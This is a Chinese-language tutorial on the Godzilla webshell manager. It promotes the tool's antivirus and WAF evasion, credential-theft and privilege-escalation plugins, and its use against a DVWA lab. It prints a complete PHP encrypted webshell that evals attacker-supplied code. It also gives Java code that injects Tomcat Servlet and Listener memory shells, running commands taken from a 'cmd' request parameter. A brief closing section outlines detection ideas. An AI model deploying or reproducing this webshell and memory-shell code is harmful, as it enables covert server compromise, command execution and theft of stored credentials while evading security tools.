哥斯拉加密WebShell过杀软

一、哥斯拉（Godzilla Shell）简介

哥斯拉是继菜刀、蚁剑、冰蝎之后具有更多优点的Webshell管理工具，由java语言开发，如名称一样，他的“凶猛”之处主要体现在：

1、哥斯拉全部类型的shell均过市面所有静态查杀。

2、静态免杀这个问题，要客观；工具放出来之后可能会免杀一段时间，后来就不行了，但是，改改代码还能继续过狗。重点还是要看流量加密和一些自带的插件。

3、哥斯拉流量加密能过市面全部流量waf。

4、哥斯拉的自带的插件是冰蝎、蚁剑不能比拟的。

如此简单的操作界面，实际效果和功能可绝不简单。

它能实现的功能除了传统的命令执行、文件管理、数据库管理之外，根据shell类型的不同还包括了：

• MSF联动
• 绕过OpenBasedir
• ZIP压缩 ZIP解压
• 代码执行
• 绕过 DisableFunctions
• Mimikatz
• 读取服务器 FileZilla Navicat Sqlyog Winscp XMangager 的配置信息以及密码
• 虚拟终端 可以用netcat连接
• Windows权限提升 （2012-2019烂土豆）
• 读取服务器 谷歌 IE 火狐 浏览器保存的账号密码
• Windows权限提升烂土豆的C#版本 甜土豆
• 支持 哥斯拉 冰蝎 菜刀 ReGeorg 的内存shell 并且支持卸载
• 屏幕截图
• Servlet管理 Servlet卸载
• 内存加载Jar 将Jar加载到 SystemClassLoader

二、管理工具安装与使用

哥斯拉下载与安装

下载地址：Release v3.03-godzilla · BeichenDream/Godzilla · GitHub

GodZilla 的运行环境：JDK 1.8

2、双击 Godzilla.jar 运行 程序之后 会在 同目录下 生成 data.db 数据库存放数据。

哥斯拉使用方法

① 哥斯拉的马（Webshell）已经内置了Payload以及加密器，是需要自己配置的 。

双击Godzilla.jar打开，此时会在同目录下生成data.db数据库存放数据。

哥斯拉支持jsp、php、aspx等多种载荷，java和c#的载荷原生实现AES加密，PHP使用亦或加密。生成时需要记住自己的生成配置用以链接时用。

点击"管理”->“添加”生成所需的webshell：

1.哥斯拉支持 jsp、php、aspx 等多种载荷。

2.java 和 c# 的载荷原生实现 AES 加密，PHP使用亦或加密。

3.生成时需要记住自己的生成配置用以连接时使用。

4.记得点击生成。

② 把生成的脚本放到了D盘下，起名为：ace.php。

 
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i$D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='verter';
$payloadName='payload';
$key='cb42e130d1471239';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (stripos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

③ 选择DVWA 靶机，上传文件

 ④ 目标 → 基础配置 → 将框选的内容填写修改，有效载荷和加密器，点击测试连接。连接成功后点击添加：

⑤ 哥斯拉也有很多功能模块，比如：基本信息、文件管理、命令执行、数据库管理等等。

（1）数据库管理

相信大家在使用蚁剑的时候没少碰到过连不上数据库的情况，我自己碰到过一个环境就是shell所在的tomcat container没有jdbc的jar包依赖导致连不上数据库，偏偏蚁剑没什么好办法。而在哥斯拉中就不必担心这个问题，在数据库管理中哥斯拉会先从容器中加载可用的jdbc，如果没有就通过内存加载jar驱动来链接数据库。

（2）内存shell

内存shell模块实现了在tomcat中注册、卸载内存马。

你可以直接注册一个哥斯拉的马或者冰蝎、菜刀的马，甚至是regeorg。

比如注册一个/Godzillashell进去：

访问发现存在：

直接哥斯拉链接就行了。内存shell 无日志，会在tomcat重启后消失。

（3）屏幕截图

点截图会自动保存预览，在windows上需要shell权限够大。

（4）虚拟终端

这个功能其实是在本地监听端口，通过shell与服务器交互实现cmdshell。点击start之后执行nc 127.0.0.1 4444链接本地4444获取cmdshell。

如果不使用nc链接的话会一直占用本地4444端口。用完请exit或点击stop。

（5）JMeterpreter

三、哥斯拉通信加密分析

流量加密分析

以jsp为例，修改链接配置里的代理选项为http代理，让流量代理到Burp中。

执行dir命令的请求包：

响应包：

或许你说headers里的一些ua和Accept太扎眼了，别担心，这些可以自己配置。在shell编辑的请求配置中修改。

或者在配置–全局配置中修改。

此时在看请求包和响应包完全没有特征：

并且在请求包的thisisleftData和thisisrightData可以修改为其他杂乱数据来进行干扰。到这里还不说一句哥斯拉天下第一？

流量加密实现

选择JavaDynamicPayload。

生成一个WebShell，需要用Unicode解码才能查看代码：

字符串xc为自定义秘钥(pass)MD5的前16位。

拼接自定义的密码和秘钥获取md5值， 这里的md5值作为认证密码和密钥,主要代码逻辑如下：

抓取连接Shell地址过程数据包，一共进行了三次请求响应：

JavaAesBase64类初始化方法如下，加解密方法与生成的WebShell相对应：

四、哥斯拉流量端检测思路

围绕流量测的检测思路，因为其流量加密的特性，其实与冰蝎Shell管理工具想法大致相同，往往需要多种弱特征结合验证，如可以通过分析Shell连接过程的简单固有特征，结合数据统计分析来进行检测等。

内存马

内存马特点：文件无需落地，更加隐蔽。以tomcat为例，内存马分为以下三种：Servlet、Filter、Listener

（1）Servlet内存马

以一个简单的Servletdemo为例，访问url，查看tomcat对应的调用栈如下：

我们知道通过web.xml或者注解的方式可以配置自定义的servlet与url的映射。而在tomcat中，Wrapper等效于Servlet，即我们只要自定义的实现该逻辑，就可实现Servlet内存马。

Servlet3.0开始提供了动态注册filter、Servlet、Listener，这里不再赘述，感兴趣的可以自己调试验证下，主要逻辑为：

1.创建自定义Servlet。

2.使用Wrapper对应进行封装。

3.添加封装后的Wrapper到StandardContext的children当中。

4.添加ServletMapping将访问的URL和Servlet进行绑定。

如234步骤实现代码如下：

// 获取StandardContext
    org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =(org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
    StandardContext standardCtx = (StandardContext)webappClassLoaderBase.getResources().getContext();
 
 
    // 用Wrapper对其进行封装
    org.apache.catalina.Wrapper newWrapper = standardCtx.createWrapper();
    newWrapper.setName("sangfor");
    newWrapper.setLoadOnStartup(1);
    newWrapper.setServlet(servlet);
    newWrapper.setServletClass(servlet.getClass().getName());
    // 添加封装后的恶意Wrapper到StandardContext的children当中
    standardCtx.addChild(newWrapper);
    // 添加ServletMapping将访问的URL和Servlet进行绑定
    standardCtx.addServletMapping("/sangfor","sangfor");

（3）Listener内存马

请求站点时，优先级如下，Listener -> Filter -> Servlet，Listener是最先被加载的

当设置了ServletRequestListener时，每次请求都会先进入Listener 进行逻辑判断

Listen监视器分类：

ServletContext监听, 服务启动和停止时触发

Session监听, Session初始化和销毁时触发

Request监听, 访问服务时触发

我们需要通过Request这个点来实现，即ServletRequestListener，主要逻辑：

自定义Listener

调用StandardContext对象的addApplicationEventListener方法来添加Listenner

（直接使用ApplicationContext的addListenner方法来动态添加Listener会进行web容器状态判断）

主要代码如下：

//listener
ServletRequestListener demoListener = new ServletRequestListener() {
 @Override
 public void requestDestroyed(ServletRequestEvent servletRequestEvent) {
 }
 @Override
 public void requestInitialized(ServletRequestEvent sre) {
 System.out.println("requestInitialized");
 String cmd = sre.getServletRequest().getParameter("cmd");
 try{
 //获取sre中的requestFacade对象
 org.apache.catalina.connector.RequestFacade requestFacade =
(org.apache.catalina.connector.RequestFacade)sre.getServletRequest();
 
 
 //反射获取RequestFacade中的request对象
 java.lang.reflect.Field connrequestField =
org.apache.catalina.connector.RequestFacade.class.getDeclaredField("request");
 connrequestField.setAccessible(true);
 org.apache.catalina.connector.Request request =
(org.apache.catalina.connector.Request) connrequestField.get(requestFacade);
 //执行命令并回显
 String[] cmds =
!System.getProperty("os.name").toLowerCase().contains("win") ? new String[]
{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};
 java.io.InputStream in =
Runtime.getRuntime().exec(cmds).getInputStream();
 java.util.Scanner s = new
java.util.Scanner(in).useDelimiter("\\a");
 String output = s.hasNext() ? s.next() : "";
 java.io.Writer writer = request.getResponse().getWriter();
 java.lang.reflect.Field usingWriter =
request.getResponse().getClass().getDeclaredField("usingWriter");
 usingWriter.setAccessible(true);
 usingWriter.set(request.getResponse(), Boolean.FALSE);
 writer.write(output);
 writer.flush();
 }catch (Exception e){
 e.printStackTrace();
 }
 }
};
//获取standardContext
org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =
(org.apache.catalina.loader.WebappClassLoaderBase)
Thread.currentThread().getContextClassLoader();
org.apache.catalina.core.StandardContext standardCtx =
(org.apache.catalina.core.StandardContext)webappClassLoaderBase.getResources().
getContext();
//添加监听器
standardCtx.addApplicationEventListener(demoListener);

（4）哥斯拉Shell管理工具实现内存马

我们再回过头来看下哥斯拉Shell管理工具中内存马的实现，内部实现了不同webshell的内存马，使用jd-gui工具打开class文件，可以看到，C刀，冰蝎不同shell的实现逻辑大相径庭，根据其shell管理工具进行了修改：

（5）内存马检测

有了其攻击手段的实现，防御检测思路也不断更新替换，上述也仅仅是tomcat的实现思路，不同容器框架的具体实现也需要对应的进行封装修改，但其思路大致相同。

万变不离其宗，在主机侧，我们可以通过以下维度是进行检测：

• 攻击行为固有行为特征
• 不同于正常业务的特殊共性
• 高危敏感行为检测

网上已有不少主机侧检测思路，如：

• 核心特点均会是被加载进jvm的类，即思路为遍历获取每个类，通过类黑名单、高危风险类筛选检测
• 内存马不落地，即本地不存在对应class文件，攻击者又会在内存马中放置危险操作这两个特性，检测对应ClassLoader目录文件是否存在class文件。我们再dump对应class（如filter）进行check

我们也可以通过RASP技术注入监测阻断恶意敏感操作，也可以达到比较好的类隔离效果。